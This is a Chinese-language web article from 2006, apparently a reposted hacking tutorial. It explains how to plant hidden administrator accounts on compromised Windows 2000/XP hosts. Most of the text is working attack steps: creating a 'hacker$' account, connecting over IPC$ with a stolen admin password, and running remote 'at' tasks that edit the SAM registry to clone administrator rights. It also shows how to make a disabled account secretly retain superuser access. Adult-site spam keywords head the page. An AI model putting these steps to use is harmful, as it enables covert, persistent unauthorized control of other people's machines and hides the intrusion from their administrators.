亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

掃一掃
關(guān)注微信公眾號(hào)

W2K/XP中多種建立隱藏超級(jí)用戶(hù)的方法
2006-05-17   

一、如何在圖形界面建立隱藏的超級(jí)用戶(hù)

  圖形界面下適用本地或開(kāi)3389終端服務(wù)的肉雞上。上面我提到的那位作者說(shuō)的方法很好,但是較為復(fù)雜,還要用到psu.exe(讓程序以系統(tǒng)用戶(hù)身份運(yùn)行的程序),如果在肉雞上的話(huà)還要上傳psu.exe。我說(shuō)的這個(gè)方法將不用到psu.exe這個(gè)程序。因?yàn)閣indows2000有兩個(gè)注冊(cè)表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實(shí)為一個(gè)程序,修改鍵值的權(quán)限時(shí)在右鍵中點(diǎn)“權(quán)限”來(lái)修改。對(duì)regedit.exe我想大家都很熟悉,但卻不能對(duì)注冊(cè)表的項(xiàng)鍵設(shè)置權(quán)限,而regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ?cè)表的項(xiàng)鍵設(shè)置權(quán)限。NT/2000/xp的帳戶(hù)信息都在注冊(cè)表的HKEY_LOCAL_MACHINESAMSAM鍵下,但是除了系統(tǒng)用戶(hù)SYSTEM外,其它用戶(hù)都無(wú)權(quán)查看到里面的信息,因此我首先用regedt32.exe對(duì)SAM鍵為我設(shè)置為“完全控制”權(quán)限。這樣就可以對(duì)SAM鍵內(nèi)的信息進(jìn)行讀寫(xiě)了了。具體步聚如下:

  1、假設(shè)我們是以超級(jí)用戶(hù)administrator登錄到開(kāi)有終端服務(wù)的肉雞上的,首先在命令行下或帳戶(hù)管理器中建立一個(gè)帳戶(hù):hacker$,這里我在命令行下建立這個(gè)帳戶(hù)

  net user hacker$ 1234 /add

  2、在開(kāi)始/運(yùn)行中輸入:regedt32.exe并回車(chē)來(lái)運(yùn)行regedt32.exe。

  3、點(diǎn)“權(quán)限”以后會(huì)彈出窗口

  點(diǎn)添加將我登錄時(shí)的帳戶(hù)添加到安全欄內(nèi),這里我是以administrator的身份登錄的,所以我就將administrator加入,并設(shè)置權(quán)限為“完全控制"。這里需要說(shuō)明一下:最好是添加你登錄的帳戶(hù)或帳戶(hù)所在的組,切莫修改原有的帳戶(hù)或組,否則將會(huì)帶來(lái)一系列不必要的問(wèn)題。等隱藏超級(jí)用戶(hù)建好以,再來(lái)這里將你添加的帳戶(hù)刪除即可。

  4、再點(diǎn)“開(kāi)始”→“運(yùn)行”并輸入"regedit.exe" 回車(chē),啟動(dòng)注冊(cè)表編輯器regedit.exe。

  打開(kāi)鍵:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

  5、將項(xiàng)hacker$、00000409、000001F4導(dǎo)出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個(gè)導(dǎo)出的文件進(jìn)行編輯,將超級(jí)用戶(hù)對(duì)應(yīng)的項(xiàng)000001F4下的鍵"F"的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)00000409下的鍵"F"的值,然后再將00000409.reg與hacker.reg合并。

  6、在命令行下執(zhí)行net user hacker$ /del將用戶(hù)hacker$刪除:net user hacker$ /del

  7、在regedit.exe的窗口內(nèi)按F5刷新,然后打文件-導(dǎo)入注冊(cè)表文件將修改好的hacker.reg導(dǎo)入注冊(cè)表即可

  8、到此,隱藏的超級(jí)用戶(hù)hacker$已經(jīng)建好了,然后關(guān)閉regedit.exe。在regedt32.exe窗口內(nèi)把HKEY_LOCAL_MACHINESAMSAM鍵權(quán)限改回原來(lái)的樣子(只要?jiǎng)h除添加的帳戶(hù)administrator即可)。

  9、注意:隱藏的超級(jí)用戶(hù)建好后,在帳戶(hù)管理器看不到hacker$這個(gè)用戶(hù),在命令行用“net user”命令也看不到,但是超級(jí)用戶(hù)建立以后,就不能再改密碼了,如果用net user命令來(lái)改hacker$的密碼的話(huà),那么在帳戶(hù)管理器中將又會(huì)看這個(gè)隱藏的超級(jí)用戶(hù)了,而且不能刪除。

二、如何在命令行下遠(yuǎn)程建立隱藏的超級(jí)用戶(hù)

  在這里將用at的命令,因?yàn)橛胊t產(chǎn)生的計(jì)劃任務(wù)是以系統(tǒng)身份運(yùn)行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開(kāi)有schedule的服務(wù),如果沒(méi)有開(kāi)啟,可用流光里帶的工具netsvc.exe或sc.exe來(lái)遠(yuǎn)程啟動(dòng),當(dāng)然其方法也可以,只要能啟動(dòng)schedule服務(wù)就行。

  對(duì)于命令行方式,你可以采用各種連接方式,如用SQLexec連接MSSQL的1433端口,也可以用telnet服務(wù),只要以你能得到一個(gè)cmdshell,并且有運(yùn)行at命令的權(quán)限就可以。

  1、首先找到一臺(tái)肉雞,至于如何來(lái)找那不是我這里所說(shuō)的話(huà)題。這里先假設(shè)找到一臺(tái)超級(jí)用戶(hù)為administrator,密碼為12345678的肉雞,現(xiàn)在我們開(kāi)始在命令行下遠(yuǎn)程為它建立隱藏的超級(jí)用戶(hù)。(例子中的主機(jī)是我的局域網(wǎng)內(nèi)的一臺(tái)主機(jī),我將它的ip地址改為13.50.97.238,,請(qǐng)勿在互聯(lián)網(wǎng)上對(duì)號(hào)入座,以免騷擾正常的ip地址。)

  2、先與肉雞建立連接,命令為: net use 13.50.97.238ipc$ "12345678" /user:"administrator

  3、用at命令在肉雞上建立一個(gè)用戶(hù)(如果at服務(wù)沒(méi)有啟動(dòng),可用小榕的netsvc.exe或sc.exe來(lái)遠(yuǎn)程啟動(dòng)):at 13.50.97.238 12:51

  c:winntsystem32net.exe user hacker$ 1234 /add

  建立這個(gè)加有$符的用戶(hù)名,是因?yàn)榧佑?符后,命令行下用net user將不顯示這個(gè)用戶(hù),但在帳戶(hù)管理器卻能看到這個(gè)用戶(hù)。

  4、同樣用at命令導(dǎo)出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下鍵值:at 13.50.97.238 12:55

  c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

  /e 是regedit.exe的參數(shù),在_LOCAL_MACHINESAMSAMDomainsaccountusers這個(gè)鍵的一定要以結(jié)尾。必要的情況下可以用引號(hào)將"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起來(lái)。

  5、將肉雞上的hacker.reg下載到本機(jī)上用記事本打開(kāi)進(jìn)行編輯命令為:copy 13.50.97.238admin$system32hacker.reg

  c:hacker.reg

  修改的方法圖形界中已經(jīng)介紹過(guò)了,這里就不作介紹了。

  6、再將編輯好的hacker.reg拷回肉雞上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg

  7、查看肉雞時(shí)間:net time 13.50.97.238 然后用at命令將用戶(hù)hacker$刪除:

  at 13.50.97.238 13:40 net user hacker$ /del

  8、驗(yàn)證hacker$是否刪除:用

  net use 13.50.97.238 /del 斷開(kāi)與肉雞的連接。

  net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帳戶(hù)hacker$與肉雞連接,不能連接說(shuō)明已刪除。

  9、再與肉雞建立連接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"

  再取得肉雞時(shí)間,用at命令將拷回肉雞的hacker1.reg導(dǎo)入肉雞注冊(cè)表:

  at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

  regedit.exe的參數(shù)/s是指安靜模式。

  10、再驗(yàn)證hacker$是否已建立,方法同上面驗(yàn)證hacker$是否被刪除一樣。

  11、再驗(yàn)證用戶(hù)hacker$是否有讀、寫(xiě)、刪的權(quán)限,如果不放心,你還可驗(yàn)證是否能建立其它帳戶(hù)。

  12、通過(guò)11可以斷定用戶(hù)hacker$具有超級(jí)用戶(hù)權(quán)限,因?yàn)樽畛跷矣胊t命令建立它的時(shí)候是一個(gè)普通用戶(hù),而現(xiàn)在卻具有遠(yuǎn)程讀、寫(xiě)、刪的權(quán)限。

三、如果肉雞沒(méi)有開(kāi)3389終端服務(wù),而我又不想用命令行,怎么辦?

  這種情況下,你也可以用界面方式來(lái)遠(yuǎn)程為肉雞建立隱藏的超級(jí)用戶(hù)。因?yàn)閞egedit.exe、regedt32.exe都有連接網(wǎng)絡(luò)注冊(cè)表的功能,你可以用regedt32.exe來(lái)為遠(yuǎn)程主機(jī)的注冊(cè)表項(xiàng)設(shè)置權(quán)限,用regedit.exe來(lái)編輯遠(yuǎn)程注冊(cè)表。帳戶(hù)管理器也有一項(xiàng)連另一臺(tái)計(jì)算機(jī)的功能,你可以用帳戶(hù)管理器為遠(yuǎn)程主機(jī)建立和刪除帳戶(hù)。具體步聚與上面介紹的相似,我就不多說(shuō)了,只它的速度實(shí)在是令人難以忍受。

  但是這里有兩個(gè)前提:1、先用net use 肉雞ipipc$ "密碼" /user:"超級(jí)用戶(hù)名"來(lái)與遠(yuǎn)程主機(jī)建立連接以后,才能用regedit.exe regedt32.exe及帳戶(hù)管理器與遠(yuǎn)程主機(jī)連接。

  2、遠(yuǎn)程主機(jī)必須開(kāi)啟遠(yuǎn)程注冊(cè)表服務(wù)(沒(méi)有開(kāi)啟的話(huà),你也可以遠(yuǎn)程開(kāi)啟,因?yàn)槟阌谐?jí)用戶(hù)的密碼了)。

  四、利用被禁用的帳戶(hù)建立隱藏的超級(jí)用戶(hù):我們可以用肉雞上被禁止的用戶(hù)來(lái)建立隱藏的超組用戶(hù).方法如下:

  1.想辦法查看有哪些用戶(hù)被細(xì)心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會(huì)將guest禁用,當(dāng)然了會(huì)禁用其它用戶(hù)。在圖形界面下,非常容易,只要在帳戶(hù)管理器中就可以看到被禁用的帳戶(hù)上有一個(gè)紅叉;而在命令行下,我還沒(méi)有想到好的辦法,只能在命令行下用命令:"net user 用戶(hù)名"一個(gè)一個(gè)來(lái)查看用戶(hù)是否被禁用。

  2.在這里,我們假設(shè)用戶(hù)hacker被管理員禁用。首先,我先用小榕的超組用戶(hù)克隆程序CA.exe,將被禁用的用戶(hù)hacker 克隆成超級(jí)用戶(hù)(克隆之后,被禁用的用戶(hù)hacker就會(huì)自動(dòng)被激活了): CA.EXE 肉雞ip Administrator 超級(jí)用戶(hù)密碼 hacher hacher密碼。

  3.如果你現(xiàn)在一個(gè)cmdshell,如利用telnet服務(wù)或SQLEXEC連接肉雞的msSQL的默認(rèn)端口1433得到的shell都可以,這時(shí)你只要輸入命令:

  net user hacker /active:no 這樣用戶(hù)hacker就被禁用了(至少表面上是這樣的),當(dāng)然你也可以將用戶(hù)hacher換成其它的被禁用的用戶(hù)。

  4.這時(shí)如果你在圖形界面下看帳戶(hù)管理器中的用戶(hù)時(shí),會(huì)發(fā)現(xiàn)用戶(hù)hacker被禁用了,但事實(shí)上是這樣的嗎?你用這個(gè)被禁用的用戶(hù)連接一下肉雞看看是否能連上?用命令:net user 肉雞ipipc$ "hacker密碼" /user:"hacker" 連一連看看。我可以告訴大家,經(jīng)過(guò)我多次試驗(yàn),次次都能成功,而且還是超級(jí)用戶(hù)權(quán)限。

  5.如果沒(méi)有cmdshell怎么辦?你可以我上面介紹的at命令來(lái)禁用用戶(hù)hacker;命令格式:at 肉雞ip 時(shí)間 net user hacker /active:no

  6.原理:具體的高深的原理我也說(shuō)不上來(lái),我只能從最簡(jiǎn)單的說(shuō)。你先在圖形界面下在帳戶(hù)管理器中禁用一下超級(jí)用戶(hù)administrator看看,肯定會(huì)彈出一對(duì)話(huà)框,并禁止你繼續(xù)禁用超級(jí)用戶(hù)administrator,同樣,因?yàn)樵诳寺r(shí),hacker在注冊(cè)表的"F"鍵被超級(jí)用戶(hù)administrator在注冊(cè)表的"F"鍵所替代,因而hacker就具有了超級(jí)用戶(hù)的權(quán)限了,但是由于hacker在注冊(cè)表內(nèi)"C"健還是原來(lái)的"C"鍵,所以hacker還是會(huì)被禁用,但是它的超級(jí)用戶(hù)權(quán)限卻不會(huì)被禁用,因此被禁用的用戶(hù)hacker還是可以連接肉雞,而且還具有超級(jí)用戶(hù)的權(quán)限。具體我也說(shuō)不明白,大家權(quán)且這么理解吧。

  五、注意的幾點(diǎn)事項(xiàng):

  1、隱藏的超級(jí)用戶(hù)建立以后,在帳戶(hù)管理器中和命令行下均看不到這個(gè)用戶(hù),但這個(gè)用戶(hù)卻存在。

  2、隱藏的超級(jí)用戶(hù)建立以后,就不能再修改密碼了,因?yàn)橐坏┬薷拿艽a,這個(gè)隱藏的超級(jí)用戶(hù)就會(huì)暴露在帳戶(hù)管理器中,而且不能刪除。

  3、如在本機(jī)上試驗(yàn)時(shí),最好用系統(tǒng)自帶的備份工具先備份好本機(jī)的“系統(tǒng)狀態(tài)”主要是注冊(cè)表的備份,因?yàn)楸救俗鲈囼?yàn)時(shí),曾出現(xiàn)過(guò)帳戶(hù)管理器中看不到任何用戶(hù),組中也看不到任何組的現(xiàn)象,但它們卻存在。幸好我有備份,呵呵。SAM鍵是畢竟系統(tǒng)最敏感的部位。

  4、本方法在2000/XP上測(cè)試通過(guò),未在NT上測(cè)試。

  注:本方法僅供研究,請(qǐng)勿將本方法用于破壞上,利用本方法造成嚴(yán)重后果者,由使用者負(fù)責(zé),本人概不負(fù)責(zé)。

熱詞搜索:

上一篇:專(zhuān)家釋疑:三問(wèn)IE7瀏覽器反釣魚(yú)欺詐
下一篇:什么是注冊(cè)表

分享到: 收藏